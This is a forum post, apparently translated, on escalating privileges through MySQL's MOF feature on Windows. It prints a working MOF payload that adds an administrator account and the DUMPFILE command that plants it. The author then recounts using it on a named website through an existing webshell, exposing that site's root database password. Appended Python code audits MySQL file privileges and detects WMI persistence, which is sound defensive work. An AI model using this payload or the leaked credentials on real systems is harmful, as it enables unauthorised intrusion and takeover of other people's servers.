Methods for defending against the MySQL MOF extension vulnerability
Some exploit code made public online:
#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
};

instance of __FilterToConsumerBinding
{
    Consumer = $Consumer;
    Filter = $EventFilter;
};

After connecting to the MySQL database, execute:

select load_file('C:\\RECYCLER\\nullevt.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
From the code above, the solutions follow:

1. Control MySQL user privileges: deny functions such as load_file and dumpfile;
2. Disallow use of the WScript.Shell component;
3. Directory permissions: on c:/windows/system32/wbem/mof/, remove the built-in special group CREATOR OWNER.
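Item 1 in practice means the FILE privilege: both LOAD_FILE() and SELECT ... INTO DUMPFILE require it, and the server's secure_file_priv setting decides which paths they may touch (NULL disables both operations, an empty value allows any path the mysqld process can reach, a directory confines them to that directory). Running mysqld under a dedicated low-privilege service account, rather than SYSTEM, additionally keeps the process itself from writing into system32. The following Python is an added example, not code from the post: it audits constructed SHOW GRANTS output together with a secure_file_priv value and reports accounts that could drop a file under the wbem\mof directory. The grant lines and account names are invented sample output, not taken from any real server.

```python
"""Audit of MySQL file-I/O exposure: which accounts hold FILE, and whether
secure_file_priv lets INTO DUMPFILE reach a given path. Added example, not
code from the post; SAMPLE_GRANTS is constructed SHOW GRANTS output."""
import re
from typing import Dict, List, Optional

# One line of SHOW GRANTS output: GRANT <privs> ON <scope> TO 'user'@'host' ...
GRANT_RE = re.compile(
    r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<scope>\S+)\s+TO\s+(?P<acct>'[^']*'@'[^']*')",
    re.IGNORECASE,
)

# FILE is a global privilege: it only ever appears in a grant ON *.*, either
# spelled out or folded into ALL [PRIVILEGES].
FILE_GRANTING = {"FILE", "ALL", "ALL PRIVILEGES"}


def account_can_write_files(grant_lines: List[str]) -> bool:
    """True if any line confers FILE, which LOAD_FILE() and INTO DUMPFILE require."""
    for line in grant_lines:
        m = GRANT_RE.match(line.strip())
        if m is None or m.group("scope") != "*.*":
            continue
        privs = {p.strip().upper() for p in m.group("privs").split(",")}
        if privs & FILE_GRANTING:
            return True
    return False


def file_io_exposure(secure_file_priv: Optional[str]) -> str:
    """NULL (None) disables LOAD_FILE/INTO DUMPFILE outright; an empty string
    places no limit on the path; a directory confines reads and writes to it."""
    if secure_file_priv is None:
        return "disabled"
    if secure_file_priv == "":
        return "unrestricted"
    return "confined:" + secure_file_priv


def _norm(path: str) -> str:
    # Windows paths: case-insensitive, '\' and '/' interchangeable. Assumption:
    # no symlinks or 8.3 short names are involved in the comparison.
    return path.replace("\\", "/").rstrip("/").lower()


def dumpfile_allowed(secure_file_priv: Optional[str], target: str) -> bool:
    """Would SELECT ... INTO DUMPFILE <target> pass the secure_file_priv check?"""
    if secure_file_priv is None:
        return False
    if secure_file_priv == "":
        return True
    return _norm(target).startswith(_norm(secure_file_priv) + "/")


def remediation(acct: str) -> str:
    """Narrowest fix: drop FILE from the account; pair it with secure_file_priv."""
    return f"REVOKE FILE ON *.* FROM {acct};"


def audit(grants_by_account: Dict[str, List[str]], secure_file_priv: Optional[str],
          watch_path: str = "c:/windows/system32/wbem/mof/") -> List[dict]:
    """List accounts that could drop a file under watch_path (the auto-compile
    directory from the post) given the server's current settings."""
    findings = []
    for acct, lines in grants_by_account.items():
        if account_can_write_files(lines) and dumpfile_allowed(secure_file_priv, watch_path + "x.mof"):
            findings.append({"account": acct,
                             "exposure": file_io_exposure(secure_file_priv),
                             "fix": remediation(acct)})
    return findings


# Constructed sample: what SHOW GRANTS FOR ... might print for two accounts.
SAMPLE_GRANTS = {
    "'root'@'localhost'": [
        "GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION",
    ],
    "'webapp'@'%'": [
        "GRANT USAGE ON *.* TO 'webapp'@'%'",
        "GRANT SELECT, INSERT, UPDATE, DELETE ON `webbmw`.* TO 'webapp'@'%'",
    ],
}

if __name__ == "__main__":
    for setting in ("", "C:\\ProgramData\\MySQL\\Uploads", None):
        print(repr(setting), "->", audit(SAMPLE_GRANTS, setting) or "no account can reach wbem/mof")
```

With secure_file_priv empty the root account is reported and the suggested REVOKE is printed; with a confined directory or NULL the same grants produce no finding, which is the configuration a hardened server should show.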
Of course, the above is what's said online. It feels like the privileges required are very high, root for example, plus a MySQL remote connection. I ran into one yesterday, so let me demonstrate it for everyone.

Here's how it happened: a buddy asked a question on the forum, I took a look and found that a master had already gotten in, saying it was done with MySQL MOF extension privilege escalation.

But this newbie had never heard of it, so I rushed off to look up material and study... which is where the content above, taken from the web, came from.
Once I understood it, time to practice.
http://www.webbmw.com/config/config_ucenter.php (one-line webshell)

$_config['db']['1']['dbhost'] = 'localhost';
$_config['db']['1']['dbuser'] = 'root';
$_config['db']['1']['dbpw'] = 'tfr226206';
$_config['db']['1']['dbcharset'] = 'gbk';
$_config['db']['1']['pconnect'] = '0';
$_config['db']['1']['dbname'] = 'webbmw';
$_config['db']['1']['tablepre'] = 'pre_';
$_config['db']['common']['slave_except_table'] = '';

There's the root password.
So I went straight in with Caidao (菜刀).

Upload the shell first.

Since we have those accounts and so on, let's execute it.......

A small note:

Here the first execution was unsuccessful, reason unknown.

I guessed maybe the code we were executing had a problem, so I went and fetched the code I'd found on wooyun.
#pragma namespace("\\\\.\\root\\subscription")

instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};

instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user test test /add\")";
};

instance of __FilterToConsumerBinding
{
    Consumer = $Consumer;
    Filter = $EventFilter;
};
I put the file at C:\WINDOWS\temp\1.mof

So we change the code to execute accordingly:

-- backslashes doubled: inside a MySQL string literal a single \t is read as a tab escape
select load_file('C:\\WINDOWS\\temp\\1.mof') into dumpfile 'c:/windows/system32/wbem/mof/nullevt.mof';
But you'll find the account still isn't sitting there..

That was frustrating.

So I executed them one by one, but on reaching the second MySQL it succeeded.........

But none of the other databases succeeded...

I'm really puzzled; why on earth did it fail? Hoping an expert can explain...
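From the defender's side, what this technique leaves behind is a WMI event subscription: an __EventFilter, a script or command-line consumer, and a __FilterToConsumerBinding joining them. The Python below is an added example, not code from the post or from any project it mentions. It parses MOF text of the kind dropped into the wbem\mof directory and reports every binding whose consumer hands execution to a scripting engine or command line, along with the trigger query and any high-signal fragments in the payload. SAMPLE_MOF is the post's own MOF with its quotes normalised, used here as constructed input; the marker list is an assumption to be tuned per environment. One caveat for anyone reproducing the failure the post describes: the MOF self-install feature (auto-compiling files placed under %SystemRoot%\system32\wbem\mof) exists only on Windows XP/2003-era systems and was removed from Windows Vista onward, so on newer hosts a dropped file is inert and the place to audit is the compiled subscription in root\subscription, which carries the same Name, Query and ScriptText properties this parser extracts.

```python
"""Detect WMI event-subscription persistence in MOF text: an
ActiveScriptEventConsumer or CommandLineEventConsumer wired to an __EventFilter
by a __FilterToConsumerBinding. Added example, not code from the post;
SAMPLE_MOF is the post's own MOF with quotes normalised (constructed input)."""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

CONSUMER_CLASSES = {"ActiveScriptEventConsumer", "CommandLineEventConsumer"}
# High-signal fragments in the consumer payload (assumed list; extend per environment).
SUSPICIOUS_MARKERS = ("WScript.Shell", "net.exe", "net user", "cmd.exe", "powershell")

# Handled grammar (enough for compiled-subscription MOFs):
#   instance of <Class> [as $Alias] { <Prop> = <value>; ... };
# where <value> is one or more adjacent "string" literals (MOF concatenates
# them like C), a $Alias reference, or a bare token. Limitation: the phrase
# "instance of" inside a string literal at top level would be misread.
_HEAD_RE = re.compile(r"instance\s+of\s+(\w+)(?:\s+as\s+\$(\w+))?\s*\{")
_STRING_RE = re.compile(r'"((?:[^"\\]|\\.)*)"')
_PROP_RE = re.compile(r"(\w+)\s*=\s*")
_ESCAPES = {"n": "\n", "t": "\t"}


@dataclass
class MofInstance:
    cls: str
    alias: Optional[str]
    props: Dict[str, str] = field(default_factory=dict)


def _unescape(raw: str) -> str:
    # \" -> ", \\ -> \, \n -> newline, any other \x -> x
    return re.sub(r"\\(.)", lambda m: _ESCAPES.get(m.group(1), m.group(1)), raw)


def _block_end(text: str, open_brace: int) -> int:
    """Index just past the '}' matching text[open_brace], skipping string literals."""
    depth, i = 0, open_brace
    while i < len(text):
        ch = text[i]
        if ch == '"':
            m = _STRING_RE.match(text, i)
            i = m.end() if m else i + 1
            continue
        if ch == "{":
            depth += 1
        elif ch == "}":
            depth -= 1
            if depth == 0:
                return i + 1
        i += 1
    raise ValueError("unterminated instance block")


def _parse_props(body: str) -> Dict[str, str]:
    props, pos = {}, 0
    while (m := _PROP_RE.search(body, pos)) is not None:
        name, pos, parts = m.group(1), m.end(), []
        while (s := _STRING_RE.match(body, pos)) is not None:  # adjacent literals
            parts.append(_unescape(s.group(1)))
            pos = s.end()
            while pos < len(body) and body[pos].isspace():
                pos += 1
        if parts:
            props[name] = "".join(parts)
        else:  # bare value such as $Consumer or 5, up to the ';'
            end = body.find(";", pos)
            end = len(body) if end < 0 else end
            props[name] = body[pos:end].strip()
            pos = end
    return props


def parse_mof(text: str) -> List[MofInstance]:
    out, pos = [], 0
    while (m := _HEAD_RE.search(text, pos)) is not None:
        open_brace = m.end() - 1
        end = _block_end(text, open_brace)
        out.append(MofInstance(m.group(1), m.group(2), _parse_props(text[open_brace + 1:end - 1])))
        pos = end
    return out


def find_persistence(text: str) -> List[dict]:
    """One finding per binding whose consumer executes script or a command line."""
    instances = parse_mof(text)
    by_alias = {i.alias: i for i in instances if i.alias}
    findings = []
    for inst in instances:
        if inst.cls != "__FilterToConsumerBinding":
            continue
        consumer = by_alias.get(inst.props.get("Consumer", "").lstrip("$"))
        filt = by_alias.get(inst.props.get("Filter", "").lstrip("$"))
        if consumer is None or consumer.cls not in CONSUMER_CLASSES:
            continue
        payload = consumer.props.get("ScriptText") or consumer.props.get("CommandLineTemplate", "")
        findings.append({
            "consumer": consumer.props.get("Name"),
            "engine": consumer.props.get("ScriptingEngine"),
            "trigger": filt.props.get("Query") if filt else None,
            "payload": payload,
            "markers": [mk for mk in SUSPICIOUS_MARKERS if mk.lower() in payload.lower()],
        })
    return findings


SAMPLE_MOF = r"""#pragma namespace("\\\\.\\root\\subscription")
instance of __EventFilter as $EventFilter
{
    EventNamespace = "Root\\Cimv2";
    Name = "filtP2";
    Query = "Select * From __InstanceModificationEvent "
            "Where TargetInstance Isa \"Win32_LocalTime\" "
            "And TargetInstance.Second = 5";
    QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $Consumer
{
    Name = "consPCSV2";
    ScriptingEngine = "JScript";
    ScriptText = "var WSH = new ActiveXObject(\"WScript.Shell\")\nWSH.run(\"net.exe user admin admin /add\")";
};
instance of __FilterToConsumerBinding
{
    Consumer = $Consumer;
    Filter = $EventFilter;
};
"""

if __name__ == "__main__":
    for f in find_persistence(SAMPLE_MOF):
        print(f"{f['consumer']} ({f['engine']}) fires on: {f['trigger']}\n  markers: {f['markers']}")
```

On the sample this reports one binding: consumer consPCSV2 under JScript, triggered every time the clock's seconds hit 5, with WScript.Shell and net.exe flagged in the script body. A binding to a consumer class that only logs (LogFileEventConsumer, for instance) produces no finding, so the output is the set of subscriptions worth removing rather than every subscription on the host.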